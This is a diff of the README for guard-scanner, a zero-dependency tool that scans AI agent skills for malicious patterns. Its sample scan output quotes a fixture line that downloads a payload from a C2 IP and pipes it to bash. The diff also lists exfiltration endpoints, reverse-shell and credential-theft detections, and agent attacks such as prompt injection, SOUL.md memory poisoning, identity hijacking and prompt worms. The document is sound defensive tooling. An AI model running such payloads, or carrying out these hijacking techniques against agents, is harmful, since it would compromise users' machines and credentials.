guard-scanner 4.0.2 → 5.0.2

package/README.md CHANGED
@@ -1,340 +1,213 @@
1
- # 🛡️ guard-scanner
1
+ # guard-scanner 🛡️
2
2
 
3
- **Security scanner for AI agent skills — catches the bad stuff before it runs.**
3
+ *The Original, Zero-Dependency Shield for the AI Agent Era.*
4
4
 
5
- Prompt injection, identity hijacking, memory poisoning, and 22+ threat categories.
6
- Zero dependencies. One command. Works with OpenClaw out of the box.
5
+ As autonomous AI agents become more prevalent, the risk of executing untrusted or malicious skills increases. **guard-scanner** is an open-source, zero-dependency static and runtime security scanner designed to help protect developers' local machines from Prompt Injections, RCEs, and Memory Poisoning.
7
6
 
8
- [![npm version](https://img.shields.io/npm/v/guard-scanner.svg?style=flat-square&color=cb3837)](https://www.npmjs.com/package/guard-scanner)
9
- [![npm downloads](https://img.shields.io/npm/dm/guard-scanner.svg?style=flat-square)](https://www.npmjs.com/package/guard-scanner)
10
- [![MIT License](https://img.shields.io/badge/license-MIT-blue.svg?style=flat-square)](LICENSE)
11
- [![Zero Dependencies](https://img.shields.io/badge/dependencies-0-success?style=flat-square)]()
12
- [![Tests Passing](https://img.shields.io/badge/tests-133%2F133-brightgreen?style=flat-square)]()
13
- [![OWASP Agentic](https://img.shields.io/badge/OWASP_Agentic-90%25-green?style=flat-square)]()
14
- [![Patterns](https://img.shields.io/badge/patterns-144%2B-blueviolet?style=flat-square)]()
7
+ Built collaboratively by the **[Guava Parity Institute](https://github.com/koatora20)** and the open-source community. We believe that AI safety infrastructure should be a shared, transparent, and accessible resource for everyone. We welcome contributions, feedback, and discussion from all developers!
15
8
 
16
- [Quick Start](#quick-start)
17
- [Threat Categories](#threat-categories) •
18
- [OpenClaw Plugin](#openclaw-plugin-setup) •
19
- [CI/CD](#cicd-integration) •
20
- [Plugin API](#plugin-api) •
21
- [🇯🇵 日本語](README_ja.md)
9
+ **144+ static patterns + 26 runtime checks** across **22 threat categories**.
22
10
 
23
- ---
11
+ [![npm](https://img.shields.io/npm/v/@guava-parity/guard-scanner)](https://www.npmjs.com/package/@guava-parity/guard-scanner)
12
+ [![license](https://img.shields.io/npm/l/@guava-parity/guard-scanner)](LICENSE)
24
13
 
25
- ## Why This Exists
26
-
27
- In February 2026, [Snyk's ToxicSkills audit](https://snyk.io) of 3,984 AI agent skills revealed:
28
- - **36.8%** contained at least one security flaw
29
- - **13.4%** had critical-level issues
30
- - **76 active malicious payloads** for credential theft, backdoors, and data exfiltration
31
-
32
- The AI agent skill ecosystem has the same supply-chain security problem that npm and PyPI had in their early days — except agent skills inherit **full shell access, file system permissions, and environment variables** of the host agent.
33
-
34
- **guard-scanner** was born from a real 3-day identity hijack incident where an AI agent's personality files were silently overwritten by a malicious skill. There was no scanner that could detect it. Now there is. 🍈
35
-
36
- ---
37
-
38
- ## Features
39
-
40
- | Feature | Description |
41
- |---|---|
42
- | **22 Threat Categories** | Snyk ToxicSkills + OWASP Agentic Top 10 + Identity Hijack + PII + Trust Exploitation |
43
- | **144+ Static Patterns** | Regex-based static analysis covering code, docs, and data files |
44
- | **26 Runtime Checks** | Real-time `before_tool_call` hook — 5-layer defense |
45
- | **IoC Database** | Known malicious IPs, domains, URLs, usernames, and typosquat names |
46
- | **Data Flow Analysis** | Lightweight JS analysis: secret reads → network calls → exec chains |
47
- | **Cross-File Analysis** | Phantom references, base64 fragment assembly, multi-file exfil detection |
48
- | **Manifest Validation** | SKILL.md frontmatter analysis for dangerous capabilities |
49
- | **Code Complexity** | File length, nesting depth, eval/exec density analysis |
50
- | **Config Impact** | Detects modifications to OpenClaw configuration files |
51
- | **Shannon Entropy** | High-entropy string detection for leaked secrets and API keys |
52
- | **Dependency Chain Scan** | Risky packages, lifecycle scripts, wildcard versions, git dependencies |
53
- | **4 Output Formats** | Terminal (with colors), JSON, [SARIF 2.1.0](https://sarifweb.azurewebsites.net), HTML dashboard |
54
- | **Plugin API** | Extend with custom detection rules via JS modules |
55
- | **Zero Dependencies** | Pure Node.js stdlib. Nothing to install, nothing to audit. |
56
- | **CI/CD Ready** | `--fail-on-findings` exit code + SARIF for GitHub Code Scanning |
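The Shannon Entropy row in the feature table can be illustrated with a short sketch. This is not guard-scanner's actual implementation: the function names, the 4.0 bits-per-character threshold, and the minimum token length are assumptions chosen for illustration only.

```javascript
// Illustrative sketch only; not taken from guard-scanner's source.
// Returns the Shannon entropy of a string in bits per character.
function shannonEntropy(text) {
  const counts = new Map();
  let total = 0;
  for (const ch of text) {
    counts.set(ch, (counts.get(ch) || 0) + 1);
    total += 1;
  }
  if (total === 0) return 0;

  let entropy = 0;
  for (const n of counts.values()) {
    const p = n / total;
    entropy -= p * Math.log2(p);
  }
  return entropy;
}

// Hypothetical cut-offs: long tokens with high entropy are flagged as
// possible secrets. A real scanner would tune both values.
const HYPOTHETICAL_ENTROPY_THRESHOLD = 4.0;
const HYPOTHETICAL_MIN_LENGTH = 20;

function looksLikeSecret(token) {
  return (
    token.length >= HYPOTHETICAL_MIN_LENGTH &&
    shannonEntropy(token) > HYPOTHETICAL_ENTROPY_THRESHOLD
  );
}
```

Repeated characters score low and evenly distributed characters score high, which is why random-looking API keys tend to stand out from ordinary identifiers.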
57
-
58
- ---
59
-
60
- ## Quick Start
61
-
62
- **30 seconds to scan your skills:**
63
-
64
- ```bash
65
- npx guard-scanner ./skills/
66
- ```
67
-
68
- No install needed. Scans every subdirectory as a skill and tells you what's dangerous.
69
-
70
- **More options:**
14
+ ## Install
71
15
 
72
16
  ```bash
73
- # Verbose output — see exactly what was found and why
74
- npx guard-scanner ./skills/ --verbose
75
-
76
- # Stricter detection (catches more edge cases)
77
- npx guard-scanner ./skills/ --strict
78
-
79
- # Full audit — JSON + SARIF + HTML report
80
- npx guard-scanner ./skills/ --verbose --check-deps --json --sarif --html
81
- ```
82
-
83
- **Output:**
84
- ```
85
- 🛡️ guard-scanner v4.0.1
86
- ══════════════════════════════════════════════════════
87
- 📂 Scanning: ./skills/
88
- 📦 Skills found: 5
89
-
90
- 🔴 shady-skill — MALICIOUS (risk: 100)
91
- 💀 [CRITICAL] Reverse shell via /dev/tcp — scripts/setup.sh:7
92
- 💀 [CRITICAL] Credential exfiltration to webhook.site — scripts/helper.js:14
93
- 🟡 sus-skill — SUSPICIOUS (risk: 45)
94
- ⚠️ [HIGH] SSH private key access — scripts/deploy.sh:3
95
- 🟢 good-skill — CLEAN (risk: 0)
17
+ npm install -g @guava-parity/guard-scanner
96
18
  ```
97
19
 
98
- ---
20
+ > **Why use this?** If you are experimenting with third-party skills for your AI agents, `guard-scanner` acts as a basic safety net, helping to identify hidden prompts or dangerous execution patterns.
21
+ >
22
+ > 🤝 **We need your help!**: The landscape of Agentic AI threats is evolving rapidly. We are maintaining this project out of goodwill to provide a baseline defense, but we rely on community contributions to keep our pattern database updated. If you find a false positive or a new threat vector, please consider opening an issue or a pull request!
99
23
 
100
- ## OpenClaw Plugin Setup
24
+ ## Quick Start
101
25
 
102
26
  ```bash
103
- # Install as OpenClaw plugin
104
- openclaw plugins install guard-scanner
105
-
106
- # Or global install
107
- npm install -g guard-scanner
108
- ```
109
-
110
- ### What happens after install
111
-
112
- 1. **Static scanning** — `npx guard-scanner [dir]` scans skills before installation
113
- 2. **Runtime guard** — `before_tool_call` hook automatically blocks dangerous operations
114
- 3. **3 enforcement modes** — `monitor` (log only), `enforce` (block CRITICAL), `strict` (block HIGH+CRITICAL)
115
-
116
- ### 5-Layer Runtime Defense (26 checks)
27
+ # Scan all skills
28
+ guard-scanner ./skills/ --verbose
117
29
 
118
- ```
119
- Layer 1: Threat Detection — 12 checks (shells, exfil, SSRF, etc.)
120
- Layer 2: Trust Defense — 4 checks (memory/SOUL/config tampering)
121
- Layer 3: Safety Judge — 3 checks (injection, trust bypass, shutdown refusal)
122
- Layer 4: Brain / Behavioral — 3 checks (research skip, blind trust, chain bypass)
123
- Layer 5: Trust Exploitation — 4 checks (OWASP ASI09: authority/trust/audit abuse)
124
- ```
30
+ # Strict mode + reports
31
+ guard-scanner ./skills/ --strict --json --sarif --fail-on-findings
125
32
 
126
- ```bash
127
- # Pre-install static gate
128
- npx guard-scanner ~/.openclaw/workspace/skills --self-exclude --verbose
33
+ # CI/CD pipeline (stdout)
34
+ guard-scanner ./skills/ --format sarif --quiet | upload-sarif
129
35
  ```
130
36
 
131
- ---
132
-
133
- ## Threat Categories
134
-
135
- guard-scanner covers **22 threat categories** derived from four sources:
136
-
137
- | # | Category | Based On | Severity | What It Detects |
138
- |---|----------|----------|----------|----------------|
139
- | 1 | **Prompt Injection** | Snyk ToxicSkills | CRITICAL | Invisible Unicode (ZWSP, BiDi), homoglyphs, role override, system tag injection, base64 execution instructions |
140
- | 2 | **Malicious Code** | Snyk ToxicSkills | CRITICAL | `eval()`, `Function()` constructor, `child_process`, reverse shells, raw sockets, sandbox detection |
141
- | 3 | **Suspicious Downloads** | Snyk ToxicSkills | CRITICAL | `curl\|bash` pipes, executable downloads, password-protected archives |
142
- | 4 | **Credential Handling** | Snyk ToxicSkills | HIGH | `.env` file reads, SSH key access, wallet seed phrases, credential echo/print |
143
- | 5 | **Secret Detection** | Snyk ToxicSkills | CRITICAL | AWS Access Keys (`AKIA...`), GitHub tokens (`ghp_/ghs_`), embedded private keys, high-entropy strings |
144
- | 6 | **Exfiltration** | Snyk ToxicSkills | CRITICAL | webhook.site/requestbin.com/hookbin, POST with secrets, `curl --data`, DNS tunneling |
145
- | 7 | **Unverifiable Deps** | Snyk ToxicSkills | HIGH | Remote dynamic imports, non-CDN script loading |
146
- | 8 | **Financial Access** | Snyk ToxicSkills | HIGH | Payment API calls (Stripe/PayPal/Plaid), wallet transaction signing |
147
- | 9 | **Obfuscation** | Snyk ToxicSkills | HIGH | Hex strings, `atob→eval` chains, `String.fromCharCode`, `base64 -d\|bash` |
148
- | 10 | **Prerequisites Fraud** | Snyk ToxicSkills | CRITICAL | Download-in-prerequisites, terminal paste instructions |
149
- | 11 | **Leaky Skills** | Snyk ToxicSkills | CRITICAL | "Save API key in memory", "Share token with user", PII collection, session log export |
150
- | 12 | **Memory Poisoning** | Palo Alto IBC | CRITICAL | SOUL.md/IDENTITY.md modification, behavioral rule override, persistence instructions |
151
- | 13 | **Prompt Worm** | Palo Alto IBC | CRITICAL | Self-replication instructions, agent-to-agent propagation, CSS-hidden content |
152
- | 14 | **Persistence** | MITRE ATT&CK | HIGH | Scheduled tasks/cron, startup execution, LaunchAgents/systemd |
153
- | 15 | **CVE Patterns** | CVE Database | CRITICAL | CVE-2026-25253 `gatewayUrl` injection, sandbox disabling, Gatekeeper bypass |
154
- | 16 | **MCP Security** | OWASP MCP Top 10 | CRITICAL | Tool poisoning (`<IMPORTANT>`), schema poisoning, token leaks, shadow server registration, SSRF |
155
- | 17 | **Identity Hijacking** | Original Research | CRITICAL | SOUL.md/IDENTITY.md overwrite/redirect, persona swap, memory wipe, name override |
156
- | 18 | **Sandbox Validation** | v1.1 | HIGH | Dangerous binary requirements in SKILL.md, overly broad file scope, sensitive env vars |
157
- | 19 | **Code Complexity** | v1.1 | MEDIUM | Excessive file length (>1000 lines), deep nesting (>5 levels), high eval/exec density |
158
- | 20 | **Config Impact** | v1.1 | CRITICAL | `openclaw.json` writes, exec approval bypass, internal hooks modification, network wildcard |
159
- | 21 | **PII Exposure** | v2.1 | CRITICAL | Hardcoded CC/SSN/phone/email, PII logging/network send/plaintext store, Shadow AI |
160
- | 22 | **Trust Exploitation** | OWASP ASI09 | HIGH | Authority abuse, audit bypass, trust chain manipulation |
161
-
162
- > **Categories 17–22** are unique to guard-scanner. Category 17 (Identity Hijacking) was developed from a real attack.
163
-
164
- ---
37
+ ## 🔍 Example Scan Output
165
38
 
166
- ## Output Formats
39
+ This is actual output from scanning a malicious test skill demonstrating data exfiltration, memory poisoning, and credential theft:
167
40
 
168
- ### Terminal (Default)
41
+ ```console
42
+ $ guard-scanner ./test/fixtures/malicious-skill/ --verbose
169
43
 
170
- ```
171
44
  🛡️ guard-scanner v4.0.1
172
45
  ══════════════════════════════════════════════════════
173
- 📂 Scanning: ./skills/
174
- 📦 Skills found: 22
46
+ 📂 Scanning: ./test/fixtures/malicious-skill/
47
+ 📦 Skills found: 1
175
48
 
176
- 🟢 my-safe-skill — CLEAN (risk: 0)
177
- 🟡 suspicious-one — SUSPICIOUS (risk: 45)
178
- 📁 credential-handling
179
- 🔴 [HIGH] Reading .env file — scripts/main.js:12
180
- 🔴 [HIGH] SSH key access — scripts/deploy.sh:8
181
- 🔴 evil-skill — MALICIOUS (risk: 100)
182
- 📁 malicious-code
183
- 💀 [CRITICAL] Reverse shell — scripts/backdoor.js:3
49
+ 🔴 scripts — MALICIOUS (risk: 100)
184
50
  📁 exfiltration
185
- 💀 [CRITICAL] Known exfiltration endpoint — scripts/exfil.js:15
51
+ 🔴 [HIGH] Suspicious domain: webhook.site — evil.js
52
+ 📁 malicious-code
53
+ 🔴 [HIGH] eval() call — evil.js:18
54
+ 💀 [CRITICAL] Shell download/execution — stealer.js:19
55
+ └─ "exec(`curl https://91.92.242.30/payload -o /tmp/x && bash"
56
+ 📁 credential-handling
57
+ 🔴 [HIGH] Credential file read — evil.js:6
58
+ └─ "readFileSync('.env"
59
+ 💀 [CRITICAL] Agent identity file read — evil.js:7
60
+ └─ "readFileSync('SOUL.md"
61
+ 📁 memory-poisoning
62
+ 💀 [CRITICAL] Write to agent soul file — evil.js:21
63
+ └─ "writeFileSync('SOUL.md"
64
+ 📁 data-flow
65
+ 💀 [CRITICAL] Data flow: secret read (L6) → network call (L10) — evil.js:6
186
66
 
187
67
  ══════════════════════════════════════════════════════
188
- 📊 Scan Summary
189
- Scanned: 22
190
- 🟢 Clean: 18
191
- 🟡 Suspicious: 1
68
+ 📊 guard-scanner Scan Summary
69
+ ──────────────────────────────────────────────────────
70
+ Scanned: 1
71
+ 🟢 Clean: 0
192
72
  🔴 Malicious: 1
193
- Safety Rate: 91%
73
+ Safety Rate: 0%
194
74
  ══════════════════════════════════════════════════════
195
- ```
196
-
197
- ### JSON (`--json`)
198
-
199
- Writes `guard-scanner-report.json` with full findings, stats, recommendations, and IoC version.
200
-
201
- ### SARIF (`--sarif`)
202
-
203
- Writes `guard-scanner.sarif`, a [SARIF 2.1.0](https://docs.github.com/en/code-security/code-scanning/integrating-with-code-scanning/sarif-support-for-code-scanning) compatible report for GitHub Code Scanning.
204
-
205
- ### HTML (`--html`)
206
-
207
- Generates a dark-mode dashboard with stats grid and per-skill finding tables.
208
-
209
- ---
210
-
211
- ## Risk Scoring
212
-
213
- Each skill receives a **risk score (0–100)** based on:
214
-
215
- ### Base Score
75
+ ⚠️ CRITICAL: 1 malicious skill(s) detected!
76
+ ```
77
+
78
+ ## 🚀 Standalone Architecture
79
+
80
+ **guard-scanner** is designed as a foundational "Shield" for the OpenClaw ecosystem.
81
+ It features a **Standalone Boot Sequence**:
82
+ - **Zero API/DB Dependencies**: It initializes purely from local, static Threat Patterns (144+ regex rules) defined in its codebase.
83
+ - **No Heavy Context Loading**: It does *not* require loading heavy memory databases or executing contextual commands.
84
+ - **Privacy First**: It never accesses or exposes your agent's private memory during the boot phase.
85
+
86
+ This lightweight initialization makes it perfect for zero-trust environments, ensuring complete safety without exposing proprietary agent logic.
87
+
88
+ ## Options
89
+
90
+ | Flag | Description |
91
+ |------|-------------|
92
+ | `--verbose`, `-v` | Detailed findings with categories and samples |
93
+ | `--strict` | Lower detection thresholds (more sensitive) |
94
+ | `--check-deps` | Scan `package.json` for dependency chain risks |
95
+ | `--soul-lock` | Enable agent identity protection (SOUL.md/MEMORY.md patterns) |
96
+ | `--json` | Write JSON report to file |
97
+ | `--sarif` | Write SARIF 2.1.0 report (GitHub Code Scanning) |
98
+ | `--html` | Write HTML dashboard report |
99
+ | `--format json\|sarif` | Print to stdout (pipeable) |
100
+ | `--quiet` | Suppress text output (use with `--format`) |
101
+ | `--self-exclude` | Skip scanning guard-scanner itself |
102
+ | `--summary-only` | Only print the summary table |
103
+ | `--rules <file>` | Load custom detection rules (JSON) |
104
+ | `--plugin <file>` | Load plugin module |
105
+ | `--fail-on-findings` | Exit code 1 if any findings (CI/CD) |
106
+
107
+ ## Threat Categories (22)
108
+
109
+ | # | Category | Detects |
110
+ |---|----------|---------|
111
+ | 1 | Prompt Injection | Hidden instructions, invisible Unicode, homoglyphs, XML tag injection |
112
+ | 2 | Malicious Code | `eval()`, `child_process`, reverse shells, raw sockets |
113
+ | 3 | Suspicious Downloads | `curl\|bash`, executable downloads, password-protected archives |
114
+ | 4 | Credential Handling | `.env` reads, SSH keys, sudo in instructions |
115
+ | 5 | Secret Detection | Hardcoded API keys, AWS keys, GitHub tokens, Shannon entropy |
116
+ | 6 | Exfiltration | webhook.site, DNS tunneling, curl data exfil |
117
+ | 7 | Unverifiable Deps | Remote dynamic imports |
118
+ | 8 | Financial Access | Crypto transactions, payment APIs |
119
+ | 9 | Obfuscation | Base64→exec, hex encoding, `String.fromCharCode` |
120
+ | 10 | Prerequisites Fraud | Fake download/paste instructions |
121
+ | 11 | Leaky Skills | Secrets saved in agent memory, verbatim in commands |
122
+ | 12 | Memory Poisoning ⚿ | SOUL.md/MEMORY.md modification, behavioral rule override |
123
+ | 13 | Prompt Worm | Self-replicating prompts, agent-to-agent propagation |
124
+ | 14 | Persistence | Cron, launchd, startup execution |
125
+ | 15 | CVE Patterns | CVE-2026-25253 (RCE), sandbox disabling, Gatekeeper bypass |
126
+ | 16 | MCP Security | Tool/schema poisoning, SSRF, shadow server registration |
127
+ | 16b | Trust Boundary | Calendar/email/web → code execution chains |
128
+ | 16c | Advanced Exfiltration | ZombieAgent static URL arrays, drip exfil, beacon |
129
+ | 16d | Safeguard Bypass | URL parameter injection, retry-on-block |
130
+ | 17 | Identity Hijacking ⚿ | SOUL.md overwrite, persona swap, memory wipe |
131
+ | 18 | Config Impact | `openclaw.json` writes, exec approval disabling |
132
+ | 19 | PII Exposure | Hardcoded CC/SSN, PII logging, Shadow AI API calls |
133
+ | 20 | Trust Exploitation | Authority claims, creator impersonation, fake audits |
134
+
135
+ > ⚿ = Requires `--soul-lock` flag (opt-in)
136
+
137
+ ## Runtime Guard (26 checks, 5 layers)
138
+
139
+ Real-time `before_tool_call` hook that blocks dangerous operations.
140
+
141
+ | Layer | Name | Checks |
142
+ |-------|------|--------|
143
+ | 1 | Threat Detection | Reverse shell, curl\|bash, SSRF, credential exfil |
144
+ | 2 | Trust Defense | SOUL.md tampering, memory injection |
145
+ | 3 | Safety Judge | Prompt injection in tool args, trust bypass |
146
+ | 4 | Behavioral | No-research execution |
147
+ | 5 | Trust Exploitation (ASI09) | Authority claim, creator bypass, fake audit |
216
148
 
217
- | Severity | Weight |
218
- |----------|--------|
219
- | CRITICAL | 40 points |
220
- | HIGH | 15 points |
221
- | MEDIUM | 5 points |
222
- | LOW | 2 points |
223
-
224
- ### Amplification Rules
225
-
226
- | Combination | Multiplier | Rationale |
227
- |---|---|---|
228
- | Credential handling + Exfiltration | **×2** | Classic steal-and-send pattern |
229
- | Credential handling + Command exec | **×1.5** | Credential-powered RCE |
230
- | Obfuscation + Malicious code | **×2** | Hiding malicious intent |
231
- | Lifecycle script exec | **×2** | npm supply chain attack |
232
- | BiDi characters + other findings | **×1.5** | Text direction attack as vector |
233
- | Leaky skills + Exfiltration | **×2** | Secret leak through LLM context |
234
- | Memory poisoning | **×1.5** | Persistent compromise |
235
- | Prompt worm | **×2** | Self-replicating threat |
236
- | Persistence + (malicious\|credential\|memory) | **×1.5** | Survives session restart |
237
- | Identity hijacking | **×2** | Core identity compromise |
238
- | Identity hijacking + Persistence | **min 90** | Full agent takeover |
239
- | Config impact | **×2** | OpenClaw configuration tampering |
240
- | PII exposure + Exfiltration | **×3** | PII being sent to external servers |
241
- | PII exposure + Shadow AI | **×2.5** | PII leak through unauthorized LLM |
242
- | Known IoC (IP/URL/typosquat) | **= 100** | Confirmed malicious |
243
-
244
- ### Verdict Thresholds
245
-
246
- | Mode | Suspicious | Malicious |
247
- |------|-----------|-----------|
248
- | Normal | ≥ 30 | ≥ 80 |
249
- | Strict (`--strict`) | ≥ 20 | ≥ 60 |
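The removed Risk Scoring section can be read as a small calculation. The sketch below uses the severity weights and verdict thresholds from the tables above, and applies just one of the listed amplifiers (credential handling + exfiltration, ×2). How the real scanner sums findings, orders multipliers, and caps the result is not stated in the README, so summing and capping at 100 are assumptions, as are the function names and the shape of a finding object.

```javascript
// Illustrative sketch only. Weights and thresholds come from the README
// tables; the combination logic is an assumption.
const SEVERITY_WEIGHTS = { CRITICAL: 40, HIGH: 15, MEDIUM: 5, LOW: 2 };

const THRESHOLDS = {
  normal: { suspicious: 30, malicious: 80 },
  strict: { suspicious: 20, malicious: 60 },
};

// findings: array of { cat, severity } objects (hypothetical shape).
function riskScore(findings) {
  let score = findings.reduce(
    (sum, f) => sum + (SEVERITY_WEIGHTS[f.severity] || 0),
    0
  );

  // One amplifier from the table: credential handling + exfiltration = x2.
  const cats = new Set(findings.map((f) => f.cat));
  if (cats.has('credential-handling') && cats.has('exfiltration')) {
    score *= 2;
  }

  // Assumed cap so the score stays within the documented 0-100 range.
  return Math.min(100, Math.round(score));
}

// Simplified verdict: anything below the "suspicious" threshold is CLEAN.
function verdict(score, strict = false) {
  const t = strict ? THRESHOLDS.strict : THRESHOLDS.normal;
  if (score >= t.malicious) return 'MALICIOUS';
  if (score >= t.suspicious) return 'SUSPICIOUS';
  return 'CLEAN';
}
```

For instance, one HIGH credential-handling finding plus one CRITICAL exfiltration finding gives a base of 55, which doubles past the cap and lands on 100, while the same score of 25 is CLEAN in normal mode but SUSPICIOUS under `--strict`.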
250
-
251
- ---
252
-
253
- ## Data Flow Analysis
254
-
255
- guard-scanner performs lightweight static analysis on JavaScript/TypeScript files to detect **multi-step attack patterns** that individual regex rules miss:
256
-
257
- ```
258
- Secret Read (L36) ─── process.env.API_KEY ───→ Network Call (L56) ─── fetch() ───→ 🚨 CRITICAL
259
- AST_CRED_TO_NET
149
+ ```bash
150
+ # Install as OpenClaw hook
151
+ openclaw hooks install skills/guard-scanner/hooks/guard-scanner
152
+ openclaw hooks enable guard-scanner
260
153
  ```
261
154
 
262
- ### Detected Chains
155
+ Modes: `monitor` (log only) / `enforce` (block CRITICAL) / `strict` (block HIGH+CRITICAL)
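The three enforcement modes amount to a lookup from mode to the severities that get blocked. The following is a minimal sketch under that reading; `shouldBlock` and the table name are hypothetical and do not come from the hook's source.

```javascript
// Illustrative sketch only; names are hypothetical.
// Maps each documented mode to the severities it blocks.
const BLOCKED_SEVERITIES = {
  monitor: [],                   // log only, never block
  enforce: ['CRITICAL'],         // block CRITICAL
  strict: ['HIGH', 'CRITICAL'],  // block HIGH and CRITICAL
};

function shouldBlock(mode, severity) {
  const blocked = BLOCKED_SEVERITIES[mode];
  if (!blocked) {
    throw new Error(`Unknown mode: ${mode}`);
  }
  return blocked.includes(severity);
}
```

Rejecting unknown modes, rather than silently falling back to `monitor`, is a design choice in this sketch so that a typo in configuration cannot disable blocking unnoticed.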
263
156
 
264
- | Pattern ID | Chain | Severity |
265
- |---|---|---|
266
- | `AST_CRED_TO_NET` | Secret read → Network call | CRITICAL |
267
- | `AST_CRED_TO_EXEC` | Secret read → Command exec | HIGH |
268
- | `AST_SUSPICIOUS_IMPORTS` | `child_process` + network module | HIGH |
269
- | `AST_EXFIL_TRIFECTA` | `fs` + `child_process` + `http/https` | CRITICAL |
270
- | `AST_SECRET_IN_URL` | Secret interpolated into URL | CRITICAL |
271
157
 
272
- ---
273
158
 
274
- ## IoC Database
159
+ ## OWASP Mapping
275
160
 
276
- Built-in Indicators of Compromise from real-world incidents:
161
+ - **OWASP LLM Top 10 2025**: LLM01–LLM10 fully mapped
162
+ - **OWASP Agentic Security Top 10**: ASI01–ASI10 coverage (tested)
277
163
 
278
- | Type | Examples | Source |
279
- |------|----------|--------|
280
- | **IPs** | `91.92.242.30` (C2) | ClawHavoc campaign |
281
- | **Domains** | `webhook.site`, `requestbin.com`, `hookbin.com`, `pipedream.net` | Common exfil endpoints |
282
- | **URLs** | `glot.io/snippets/hfd3x9ueu5` | ClawHavoc macOS payload |
283
- | **Usernames** | `zaycv`, `Ddoy233`, `Sakaen736jih` | Known malicious actors |
284
- | **Filenames** | `openclaw-agent.zip`, `openclawcli.zip` | Trojanized installers |
285
- | **Typosquats** | `clawhub`, `polymarket-trader`, `auto-updater-agent` + 20 more | ClawHavoc, Polymarket, Snyk ToxicSkills |
286
-
287
- Any match against the IoC database automatically sets risk to **100 (MALICIOUS)**.
164
+ ## Test Results
288
165
 
289
- ---
166
+ ```
167
+ ℹ tests 134
168
+ ℹ suites 24
169
+ ℹ pass 134
170
+ ℹ fail 0
171
+ ℹ duration_ms 171
172
+ ```
173
+
174
+ | Suite | Tests |
175
+ |-------|-------|
176
+ | Malicious Skill Detection | 16 ✅ |
177
+ | Clean Skill (False Positive) | 2 ✅ |
178
+ | Risk Score Calculation | 5 ✅ |
179
+ | Verdict Determination | 5 ✅ |
180
+ | Output Formats (JSON/SARIF/HTML) | 4 ✅ |
181
+ | Pattern Database (135 patterns, 22 categories) | 4 ✅ |
182
+ | IoC Database | 5 ✅ |
183
+ | Shannon Entropy | 2 ✅ |
184
+ | Ignore Functionality | 1 ✅ |
185
+ | Plugin API | 1 ✅ |
186
+ | Skill Manifest Validation | 4 ✅ |
187
+ | Code Complexity Metrics | 2 ✅ |
188
+ | Report Noise Regression | 2 ✅ |
189
+ | Config Impact Analysis | 4 ✅ |
190
+ | PII Exposure Detection | 8 ✅ |
191
+ | OWASP Agentic Security (ASI01–10) | 14 ✅ |
192
+ | Runtime Guard (5 layers, 26 checks) | 23 ✅ |
290
193
 
291
194
  ## Plugin API
292
195
 
293
- Extend guard-scanner with custom detection rules:
294
-
295
196
  ```javascript
296
- // my-org-rules.js
197
+ // my-plugin.js
297
198
  module.exports = {
298
- name: 'my-org-security-rules',
199
+ name: 'my-plugin',
299
200
  patterns: [
300
- {
301
- id: 'ORG_INTERNAL_API',
302
- cat: 'data-leak',
303
- regex: /api\.internal\.mycompany\.com/gi,
304
- severity: 'CRITICAL',
305
- desc: 'Internal API endpoint exposed in skill',
306
- all: true // scan all file types
307
- },
308
- {
309
- id: 'ORG_STAGING_CRED',
310
- cat: 'secret-detection',
311
- regex: /staging[_-](?:key|token|password)\s*[:=]\s*['"][^'"]+['"]/gi,
312
- severity: 'HIGH',
313
- desc: 'Staging credential hardcoded',
314
- codeOnly: true // only scan code files
315
- }
201
+ { id: 'MY_01', cat: 'custom', regex: /pattern/g, severity: 'HIGH', desc: 'Description', all: true }
316
202
  ]
317
203
  };
318
204
  ```
319
205
 
320
206
  ```bash
321
- guard-scanner ./skills/ --plugin ./my-org-rules.js
207
+ guard-scanner ./skills/ --plugin ./my-plugin.js
322
208
  ```
323
209
 
324
- ### Pattern Schema
325
-
326
- | Field | Type | Required | Description |
327
- |---|---|---|---|
328
- | `id` | string | ✅ | Unique pattern identifier (e.g., `ORG_001`) |
329
- | `cat` | string | ✅ | Category name for grouping |
330
- | `regex` | RegExp | ✅ | Detection pattern (use `g` flag) |
331
- | `severity` | string | ✅ | `CRITICAL` \| `HIGH` \| `MEDIUM` \| `LOW` |
332
- | `desc` | string | ✅ | Human-readable description |
333
- | `all` | boolean | | Scan all file types |
334
- | `codeOnly` | boolean | | Only scan code files (.js, .ts, .py, .sh, etc.) |
335
- | `docOnly` | boolean | | Only scan documentation files (.md, .txt, etc.) |
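The Pattern Schema table can be turned into a quick pre-flight check for plugin authors. The validator below is a hypothetical helper, not part of guard-scanner; it only encodes the field names, types, and severity values listed in the table.

```javascript
// Illustrative sketch only; validatePattern is a hypothetical helper.
const SEVERITIES = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW'];

// Returns a list of problems; an empty list means the pattern
// satisfies the schema table.
function validatePattern(pattern) {
  const errors = [];

  for (const field of ['id', 'cat', 'severity', 'desc']) {
    if (typeof pattern[field] !== 'string' || pattern[field] === '') {
      errors.push(`${field} must be a non-empty string`);
    }
  }

  if (!(pattern.regex instanceof RegExp)) {
    errors.push('regex must be a RegExp');
  } else if (!pattern.regex.global) {
    errors.push('regex should use the g flag');
  }

  if (typeof pattern.severity === 'string' && !SEVERITIES.includes(pattern.severity)) {
    errors.push(`severity must be one of ${SEVERITIES.join(', ')}`);
  }

  for (const flag of ['all', 'codeOnly', 'docOnly']) {
    if (pattern[flag] !== undefined && typeof pattern[flag] !== 'boolean') {
      errors.push(`${flag} must be a boolean when present`);
    }
  }

  return errors;
}
```

Running this over `module.exports.patterns` before passing the file to `--plugin` would catch a missing `g` flag or a misspelled severity early.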
336
-
337
- ### Custom Rules via JSON
210
+ ## Custom Rules (JSON)
338
211
 
339
212
  ```json
340
213
  [
@@ -344,351 +217,34 @@ guard-scanner ./skills/ --plugin ./my-org-rules.js
344
217
  "flags": "gi",
345
218
  "severity": "HIGH",
346
219
  "cat": "malicious-code",
347
- "desc": "Dangerous function call"
220
+ "desc": "Custom: dangerous function call",
221
+ "codeOnly": true
348
222
  }
349
223
  ]
350
224
  ```
351
225
 
352
226
  ```bash
353
- guard-scanner ./skills/ --rules ./custom-rules.json
354
- ```
355
-
356
- ---
357
-
358
- ## Ignore Files
359
-
360
- Create `.guard-scanner-ignore` (or `.guava-guard-ignore`) in the scan directory:
361
-
362
- ```gitignore
363
- # Ignore trusted skills
364
- my-trusted-skill
365
- internal-tool
366
-
367
- # Ignore specific patterns (false positives)
368
- pattern:MAL_CHILD
369
- pattern:CRED_ENV_REF
370
- ```
371
-
372
- ---
373
-
374
- ## CLI Reference
375
-
376
- ```
377
- Usage: guard-scanner [scan-dir] [options]
378
-
379
- Arguments:
380
